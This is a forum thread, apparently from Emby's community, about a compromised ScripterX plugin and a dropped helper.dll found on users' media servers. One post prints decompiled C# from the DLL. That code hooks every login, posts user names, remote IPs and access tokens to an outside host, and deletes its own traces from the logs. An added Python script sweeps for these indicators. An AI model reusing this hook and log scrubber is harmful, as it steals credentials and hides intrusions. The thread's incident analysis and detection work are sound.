ebr 14930 Posted May 20, 2023
1 minute ago, Luke said:
    We'll be able to tell by the features they advertise.
Yeah, but anything nefarious (which, this wasn't directly but could have been) just wouldn't advertise it. So we'll have to go deeper than that.

softworkz 3341 Posted May 20, 2023
23 minutes ago, ebr said:
    Yeah, but anything nefarious (which, this wasn't directly but could have been) just wouldn't advertise it. So we'll have to go deeper than that.
Yes, we need to understand what a plugin does and how, and evaluate the risk that is involved.

bandit8623 48 Posted May 20, 2023 (edited)
At the end of the day though, it's up to the server owner to make the decision to install a plugin. You risk things the more plugins you install....
Edited May 20, 2023 by bandit8623

tongeha 2 Posted May 20, 2023 (Author)
I'm still trying to determine how it found its way onto the machine. The only way was through emby; all other ports are shut down. Once on the machine it took these actions:
1. installed ScripterX
2. attempted a no-password login and was refused
3. tried downloading helper.dll, which looks like a compromised version of ScripterX
4. uninstalled ScripterX
I am unsure of the correct order. I did find EmbyHelper.dll in the emby temp directory, but it is not flagged as a virus by Win 10:
    {emby_temp}\plugins\EmbyHelper.dll
and it does not appear to be loaded by any process. I did have Webhooks installed in emby, which I never used. Still need to look at Webhooks' dependencies and see if it uses ScripterX. For now I'm going to run emby in a separate account and only give it access to the media directory on my NAS. Or I may go back to running it on Ubuntu or a TrueNAS jail.

Luke 37116 Posted May 20, 2023
6 minutes ago, tongeha said:
    I'm still trying to determine how it found its way onto the machine. The only way was through emby; all other ports are shut down. Once on the machine it took these actions:
    1. installed ScripterX
    2. attempted a no-password login and was refused
    3. tried downloading helper.dll, which looks like a compromised version of ScripterX
    4. uninstalled ScripterX
    I am unsure of the correct order. I did find EmbyHelper.dll in the emby temp directory, but it is not flagged as a virus by Win 10: {emby_temp}\plugins\EmbyHelper.dll, and it does not appear to be loaded by any process. I did have Webhooks installed in emby, which I never used. Still need to look at Webhooks' dependencies and see if it uses ScripterX. For now I'm going to run emby in a separate account and only give it access to the media directory on my NAS. Or I may go back to running it on Ubuntu or a TrueNAS jail.
If you mean how did the plug-in get installed, it's extremely common that users install or configure things when they're experimenting and then later forget that they did that. We see it on a pretty much daily basis when troubleshooting with users.

softworkz 3341 Posted May 20, 2023 (edited)
7 minutes ago, tongeha said:
    I did find EmbyHelper.dll in the emby temp directory, but it is not flagged as a virus by Win 10: {emby_temp}\plugins\EmbyHelper.dll, and it does not appear to be loaded by any process.
Yes, that's because Emby loads plugins in a special way. And that's not a "temp" directory.
Edited May 20, 2023 by softworkz

tongeha 2 Posted May 20, 2023 (Author)
Pretty sure it is an emby temp dir. That's the way I have it configured. Emby runs on its own dedicated drive. I have it set up this way because of an old emby bug where it would not clean up the parts from an HLS stream and it would fill up the drive over time. Never installed ScripterX on purpose. I did have Webhooks installed but never used it for anything.
    D:\emby_temp\cache\0bbbe58aa44244109a8862cc833dc955_channels
    D:\emby_temp\cache\c2e44542eacb47e785ff724dc10487c6_channels
    D:\emby_temp\cache\fanart-movies
    D:\emby_temp\cache\fanart-tv
    D:\emby_temp\cache\ffmpeg
    D:\emby_temp\cache\httpclient
    D:\emby_temp\cache\images
    D:\emby_temp\cache\omdb
    D:\emby_temp\cache\remote-images
    D:\emby_temp\cache\temp
    D:\emby_temp\cache\tmdb-movies2
    D:\emby_temp\cache\tmdb-tv
    D:\emby_temp\cache\tvdb
    D:\emby_temp\cache\tvdb-movies
    D:\emby_temp\cache\xmltv
    D:\emby_temp\cache\fanart-movies\699
    D:\emby_temp\cache\fanart-movies\9319
    D:\emby_temp\cache\fanart-movies\699\fanart.json
    D:\emby_temp\cache\fanart-movies\9319\fanart.json
    D:\emby_temp\cache\fanart-tv\290734
    D:\emby_temp\cache\fanart-tv\325186
    D:\emby_temp\cache\fanart-tv\73255
    D:\emby_temp\cache\fanart-tv\290734\fanart.json
    D:\emby_temp\cache\fanart-tv\325186\fanart.json

ebr 14930 Posted May 20, 2023
2 hours ago, tongeha said:
    I'm still trying to determine how it found its way onto the machine.
What is "it" in that sentence?

tongeha 2 Posted May 20, 2023 (Author)
The mystery continues. I found this in ScheduleTasks:
    {
      "StartTimeUtc": "2023-05-11T17:54:54.4550806Z",
      "EndTimeUtc": "2023-05-11T17:54:54.4562473Z",
      "Status": "Completed",
      "Name": "Emby ScripterX Scheduled Task",
      "Key": "embscriptxschedtask00001",
      "Id": "09b64e34940a61db86d4939f418b338b"
    }
And this in system.xml:
    <UninstalledPlugins>
      <string>TVHeadEnd.dll</string>
      <string>MediaBrowser.Channels.IPTV.dll</string>
      <string>EmbyScripterX.dll</string>
    </UninstalledPlugins>

ebr 14930 Posted May 20, 2023
1 hour ago, tongeha said:
    {
      "StartTimeUtc": "2023-05-11T17:54:54.4550806Z",
      "EndTimeUtc": "2023-05-11T17:54:54.4562473Z",
      "Status": "Completed",
      "Name": "Emby ScripterX Scheduled Task",
      "Key": "embscriptxschedtask00001",
      "Id": "09b64e34940a61db86d4939f418b338b"
    }
I imagine that was created by the plug-in, as that would be a common practice.
1 hour ago, tongeha said:
    And this in system.xml:
    <UninstalledPlugins>
      <string>TVHeadEnd.dll</string>
      <string>MediaBrowser.Channels.IPTV.dll</string>
      <string>EmbyScripterX.dll</string>
    </UninstalledPlugins>
And I imagine you uninstalled the plug-in when you discovered this situation...?

Spaceboy 2495 Posted May 20, 2023
Are you recommending uninstalling this plugin then?

softworkz 3341 Posted May 20, 2023 (edited)
3 minutes ago, Spaceboy said:
    Are you recommending uninstalling this plugin then?
Yes.
EDIT: At least for now.
Edited May 20, 2023 by softworkz

Luke 37116 Posted May 20, 2023
5 minutes ago, Spaceboy said:
    Are you recommending uninstalling this plugin then?
I've whipped up a command line launcher of our own that you'll be able to try soon. It hooks into the notification system so it has the same UI, events, filters and data as web hooks.

TeamB 2354 Posted May 20, 2023
If anyone is interested, here is the source of the helper.dll linked to in the first post CDN. This is decompiled from the DLL. As mentioned above, some interesting tell-tales:

    // Registers a handler that fires on every successful login to the server.
    private void subscribeEvents() =>
        this._sessionManager.AuthenticationSucceeded +=
            new EventHandler<GenericEventArgs<AuthenticationResult>>(this._sessionManager_AuthenticationSucceeded);

    // On each successful login, builds a JSON body with server ports, version, OS,
    // the user, device, remote IP and the session access token, and POSTs it to a remote host.
    private void _sessionManager_AuthenticationSucceeded(object sender, GenericEventArgs<AuthenticationResult> e)
    {
        AuthenticationResult authenticationResult = e.Argument;
        StringContent content = new StringContent(string.Format(
            "{{\"version\":\"{0}\",\"serverName\":\"{1}\",\"serverPort\":\"{2}\",\"serverHttpsPort\":\"{3}\",\"serverPublicPort\":\"{4}\",\"serverPublicHttpsPort\":\"{5}\",\"serverVersion\":\"{6}\",\"serverPlatformOs\":\"{7}\",\"serverPlatformOsVer\":\"{8}\",\"userId\":\"{9}\",\"username\":\"{10}\",\"userServerName\":\"{11}\",\"serverId\":\"{12}\",\"deviceId\":\"{13}\",\"deviceName\":\"{14}\",\"deviceRemoteIpaddress\":\"{15}\", \"accessToken\":\"{16}\"}}",
            (object) EmbyHelper.Version.VersionNumber,
            (object) Plugin._Controller._serverApplicationHost.FriendlyName,
            (object) Plugin._Controller.sxServerConfigManager().getServerConfigurationManager().Configuration.HttpServerPortNumber.ToString(),
            (object) Plugin._Controller.sxServerConfigManager().getServerConfigurationManager().Configuration.HttpsPortNumber.ToString(),
            (object) Plugin._Controller.sxServerConfigManager().getServerConfigurationManager().Configuration.PublicPort.ToString(),
            (object) Plugin._Controller.sxServerConfigManager().getServerConfigurationManager().Configuration.PublicHttpsPort.ToString(),
            (object) Plugin._Controller._applicationHost.ApplicationVersion,
            (object) Plugin._Controller._environmentInfo.OperatingSystemName,
            (object) Plugin._Controller._environmentInfo.OperatingSystemVersion,
            (object) authenticationResult.User.Id.ToString(),
            (object) authenticationResult.SessionInfo.UserName,
            (object) authenticationResult.User.ServerName,
            (object) authenticationResult.ServerId,
            (object) authenticationResult.SessionInfo.DeviceId,
            (object) authenticationResult.SessionInfo.DeviceName,
            (object) authenticationResult.SessionInfo.RemoteEndPoint,
            (object) authenticationResult.AccessToken),
            Encoding.UTF8, "application/json");
        HttpResponseMessage httpResponseMessage;
        Task.Run((Func<Task>) (async () =>
            httpResponseMessage = await new HttpClient().PostAsync("https://emmm.spxaebjhxtmddsri.xyz/expanse2362", (HttpContent) content).ConfigureAwait(false)));
    }

and

    // Rewrites a log file, dropping every line that mentions the helper or ScripterX.
    public static void CleanLog(string filePath)
    {
        List<string> list = ((IEnumerable<string>) File.ReadAllLines(filePath))
            .Where<string>((Func<string, bool>) (line =>
                !line.Contains("EmbyHelper") && !line.Contains("ScripterX") && !line.Contains("scripterx")))
            .ToList<string>();
        File.WriteAllLines(filePath, (IEnumerable<string>) list);
    }

Attachment: helper.zip

Spaceboy 2495 Posted May 21, 2023
9 hours ago, Luke said:
    I've whipped up a command line launcher of our own that you'll be able to try soon. It hooks into the notification system so it has the same UI, events, filters and data as web hooks.
I only use it to initiate a comskip process as a recording starts. Emby only has options for post-processing.

rbjtech 4289 Posted May 21, 2023 (edited)
11 hours ago, Luke said:
    I've whipped up a command line launcher of our own that you'll be able to try soon. It hooks into the notification system so it has the same UI, events, filters and data as web hooks.
Cool - I just use Scripter-X to write a separate Auth log which is pushed via ssh to my DMZ/RP for fail2ban. If the native Emby Webhooks can write the Auth log, then I'd happily get rid of Scripter-X, as I was unhappy with the 'package' side of Scripter-X anyway but there is no way to disable just that part. Thanks for the update all.
HOWEVER - I'm still unclear (as is the OP) on how Scripter-X was installed in the first place. Is there a vulnerability (spoofing local access via remote access) in Emby (on the current Release) or not? As with no local Admin password, that is all it would take to remotely install Scripter-X, which then acts as a springboard for further executable code to be downloaded...?
Edited May 21, 2023 by rbjtech

Spaceboy 2495 Posted May 21, 2023
1 hour ago, rbjtech said:
    HOWEVER - I'm still unclear (as is the OP) on how Scripter-X was installed in the first place. Is there a vulnerability (spoofing local access via remote access) in Emby (on the current Release) or not? As with no local Admin password, that is all it would take to remotely install Scripter-X, which then acts as a springboard for further executable code to be downloaded...?
Agreed - this has absolutely not been answered, and I'm not comforted by the devs ignoring the explicit questions on this.

ebr 14930 Posted May 21, 2023
1 hour ago, rbjtech said:
    I'm still unclear (as is the OP) on how Scripter-X was installed in the first place.
We are too, but I think the most likely answer is that it was done years ago and forgotten about. Perhaps even manually, before the plug-in was in the catalog.

Spaceboy 2495 Posted May 21, 2023
9 minutes ago, ebr said:
    We are too, but I think the most likely answer is that it was done years ago and forgotten about. Perhaps even manually, before the plug-in was in the catalog.
But still not answered: the point on whether the vulnerability discovered and patched in beta has been fixed in stable. Avoidance is not a good look.

ebr 14930 Posted May 21, 2023
1 minute ago, Spaceboy said:
    But still not answered: the point on whether the vulnerability discovered and patched in beta has been fixed in stable.
The version number has not changed, so I don't believe any patches have been issued.

tongeha 2 Posted May 21, 2023 (Author)
I think the local logon theory is the most likely scenario. Someone has figured out how to do a no-password logon from a remote host. Once logged on they install ScripterX. Then use ScripterX to download helper.dll. Helper.dll installs an auth hook, posts the server details to a host that is now defunct and tries to remove any evidence of itself and ScripterX from the logs.

Spaceboy 2495 Posted May 21, 2023
3 hours ago, ebr said:
    The version number has not changed, so I don't believe any patches have been issued.
Can I assume that, based on the lack of activity fixing it, you don't think this is a particularly significant issue? I really hope you're not just waiting for 4.8 to go stable, because it feels like it's been a couple of weeks since this issue was reported and you've been hoping in vain for 4.8 to go stable for a while now. And even when it does, a lot of people will prefer to remain on 4.7 until the new version settles down. This issue needs patching in 4.7 ASAP.

flashls82 4 Posted May 22, 2023 (edited)
22 hours ago, tongeha said:
    I think the local logon theory is the most likely scenario. Someone has figured out how to do a no-password logon from a remote host. Once logged on they install ScripterX. Then use ScripterX to download helper.dll. Helper.dll installs an auth hook, posts the server details to a host that is now defunct and tries to remove any evidence of itself and ScripterX from the logs.
This is definitely what's happening because it happened to me (on a Synology NAS). Saw an error randomly the other day on a ScripterX task in my log. I never installed it and am the only local user on the system. Looked into it and it was installed about a week ago right after my user authenticated from "127.0.0.1" (was 100% not me and it's not the local IP that shows up when I log in for real). Not great!!
Edited May 22, 2023 by flashls82

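Pulling the indicators from this thread together, here is an added example of a responder's sweep over the artifacts people have reported: the <UninstalledPlugins> list in system.xml and the scheduled-task record tongeha posted, an EmbyHelper.dll / EmbyScripterX.dll file in the plugins directory, the log-scrubbing behaviour of the decompiled CleanLog(), and the loopback-address login that flashls82 saw. It is not Emby's code or the plugin's; the sample artifacts are constructed from what the thread shows, the log line format is an assumption (Emby's real log format is not on this page), and the second task record and the other DLL name in the directory listing are made up for contrast.

```python
"""Indicator sweep for the ScripterX / EmbyHelper.dll findings in this thread.

Added example, not Emby's code nor the plugin's. All samples are constructed;
the log line format is assumed, not Emby's real format.
"""
import json
import re
import xml.etree.ElementTree as ET

# Names taken from the thread: the plugin DLL, the dropped helper, the task key prefix.
SUSPECT_DLLS = {"EmbyScripterX.dll", "EmbyHelper.dll"}
TASK_KEY_PREFIX = "embscriptxschedtask"
# Strings the decompiled CleanLog() strips from the log file.
CLEANLOG_TOKENS = ("EmbyHelper", "ScripterX", "scripterx")


def uninstalled_plugins(system_xml: str) -> list[str]:
    """Return the <UninstalledPlugins> entries recorded in system.xml."""
    root = ET.fromstring(system_xml)
    node = root.find(".//UninstalledPlugins")
    return [s.text for s in node.findall("string")] if node is not None else []


def scripterx_tasks(tasks_json: str) -> list[dict]:
    """Return scheduled-task records whose Key or Name ties them to ScripterX."""
    tasks = json.loads(tasks_json)
    if isinstance(tasks, dict):          # a single record, as posted in the thread
        tasks = [tasks]
    return [t for t in tasks
            if t.get("Key", "").startswith(TASK_KEY_PREFIX)
            or "ScripterX" in t.get("Name", "")]


def suspect_files(listing: list[str]) -> list[str]:
    """Return listing entries whose file name is one of the known DLLs (Windows or POSIX paths)."""
    return [p for p in listing if re.split(r"[\\/]", p)[-1] in SUSPECT_DLLS]


def log_scrub_indicator(uninstalled: list[str], log_lines: list[str]) -> bool:
    """True when config proves the plugin was present but the log never mentions it.

    CleanLog() deletes every line containing CLEANLOG_TOKENS, so a log that is
    silent about a plugin system.xml says was installed is itself a finding.
    """
    had_plugin = any(d in SUSPECT_DLLS for d in uninstalled)
    mentions = any(tok in line for line in log_lines for tok in CLEANLOG_TOKENS)
    return had_plugin and not mentions


# Assumed log shape: "<timestamp> Info ... User <name> authenticated from <ip>".
AUTH_RE = re.compile(r"User (?P<user>\S+) authenticated from (?P<ip>[\d.]+)")


def loopback_logins(log_lines: list[str]) -> list[tuple[str, str]]:
    """Return (user, ip) for successful logins that claim to come from 127.0.0.1."""
    hits = []
    for line in log_lines:
        m = AUTH_RE.search(line)
        if m and m.group("ip") == "127.0.0.1":
            hits.append((m.group("user"), m.group("ip")))
    return hits


# ---- constructed samples (wrapped / extended from what the thread shows) ----
SYSTEM_XML = """<ServerConfiguration>
  <UninstalledPlugins>
    <string>TVHeadEnd.dll</string>
    <string>MediaBrowser.Channels.IPTV.dll</string>
    <string>EmbyScripterX.dll</string>
  </UninstalledPlugins>
</ServerConfiguration>"""

TASKS_JSON = json.dumps([
    {"Status": "Completed", "Name": "Emby ScripterX Scheduled Task",
     "Key": "embscriptxschedtask00001", "Id": "09b64e34940a61db86d4939f418b338b"},
    {"Status": "Completed", "Name": "Constructed benign task", "Key": "constructed0001", "Id": "0"},
])

PLUGIN_LISTING = [r"D:\emby_temp\plugins\EmbyHelper.dll", r"D:\emby_temp\plugins\ConstructedOther.dll"]

LOG_LINES = [  # constructed; note no line mentions ScripterX, as after CleanLog()
    "2023-05-11 17:50:01.000 Info Server: User admin authenticated from 192.168.1.20",
    "2023-05-11 17:52:10.000 Info Server: User admin authenticated from 127.0.0.1",
    "2023-05-11 17:54:54.455 Info TaskManager: Executing scheduled task",
]


def sweep(system_xml=SYSTEM_XML, tasks_json=TASKS_JSON,
          listing=PLUGIN_LISTING, log_lines=LOG_LINES) -> dict:
    """Run every check and return one report dict."""
    uninstalled = uninstalled_plugins(system_xml)
    return {
        "uninstalled_suspects": [d for d in uninstalled if d in SUSPECT_DLLS],
        "scripterx_tasks": [t["Key"] for t in scripterx_tasks(tasks_json)],
        "suspect_files": suspect_files(listing),
        "scrubbed_log": log_scrub_indicator(uninstalled, log_lines),
        "loopback_logins": loopback_logins(log_lines),
    }


if __name__ == "__main__":
    print(json.dumps(sweep(), indent=2))
```

The scrub check is the one worth keeping in mind: because CleanLog() rewrites the log in place, the absence of any ScripterX line next to a system.xml entry that proves the plugin existed is evidence, which is also why rbjtech's habit of shipping the auth log off the host (where the plugin cannot rewrite it) is the sound default.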
crusher11 854 Posted May 25, 2023
Is this the thing the giant red warning on the forums is about? Am I right in thinking it shouldn't have affected servers running the beta, as the exploit got closed there?

softworkz 3341 Posted May 25, 2023
1 minute ago, crusher11 said:
    Is this the thing the giant red warning on the forums is about? Am I right in thinking it shouldn't have affected servers running the beta, as the exploit got closed there?
Only on 4.8.0.31 and later. Many are still running earlier betas, though.